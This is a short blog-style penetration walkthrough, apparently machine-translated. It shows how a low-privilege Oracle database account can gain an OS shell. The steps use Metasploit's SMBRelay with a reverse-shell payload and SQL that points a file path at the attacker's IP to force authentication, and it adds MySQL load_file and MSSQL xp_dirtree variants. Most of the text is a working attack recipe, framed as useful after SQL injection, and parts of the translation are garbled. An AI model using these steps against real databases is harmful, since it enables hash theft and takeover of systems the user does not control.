Oracle Low-privilege Database account get OS access right to use _oracle

It's interesting to see a document called "Penetration:from application down to OS (Oracle)" These days, and the general meaning of the document is that if Oracle services are started with an administrator account, you can just have A database account with resource and connect permissions can use the SMBRelay function of Metasploit to build an SMB spoofing server locally to gain access to the system. I had a local test and it really worked. :-)

The concrete principle analysis reads the original, I here to write out my test process.

My infiltration environment is Ubuntu8.10+metasploit 3.3 dev,oracle database version 10.2.0.1.0, service startup permissions for the administrator, database account with the DBSNMP account default permissions.

1. First use the netstat command to check, the local 139 port is not occupied, the general usage of this port service is Samba, to turn off. The Ubuntu closure method is Sudo/etc/init.d/samba stop<p>

2. Run Metasploit, I choose the PAYLOAD is shell_reverse_tcp, do the corresponding configuration, exploit. You can use Netstat to see that the Local has been listening for 139 and 8522 ports.

3. I now use the DBSNMP default account to connect to the Oracle database, this account default permissions are relatively low, only Connect and resource permissions.

4. Then execute the following 3 SQL statements

sql> CREATE TABLE files (ID number PRIMARY Key,path VARCHAR (255) Unique,ot_format VARCHAR (6)); Sql> INSERT into Files VALUES (1, ' \\192.168.1.52\mickey ', NULL); Sql> CREATE INDEX file_index on Files (path) Indextype is Ctxsys.context 2 PARAMETERS (' Datastore ctxsys.file_datastor e format column Ot_format ');

Later, after pt007, I tested the MySQL, if the service is also initiated by the administrator, with select Load_file (' \\\\192.168.1.52\mk.txt ') can also get system permissions. MSSQL should use the Xp_dirtree stored procedure is also OK, but I did not configure to use the Administrator account to start MSSQL services, I hope to know friends pointing me.

This technology can be used in intranet WEB evaluation, if there is injection, the service is initiated by the administrator, you can mention the right.

Two PDF downloads,

Author: Mickey
Http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_ (oracle%20database). pdf
Http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

When you finish the statement "CREATE INDEX", looking at our local Metasploit, we have already got the half LM hash and Cmdshell of the current service user of the ORACLE database host's system.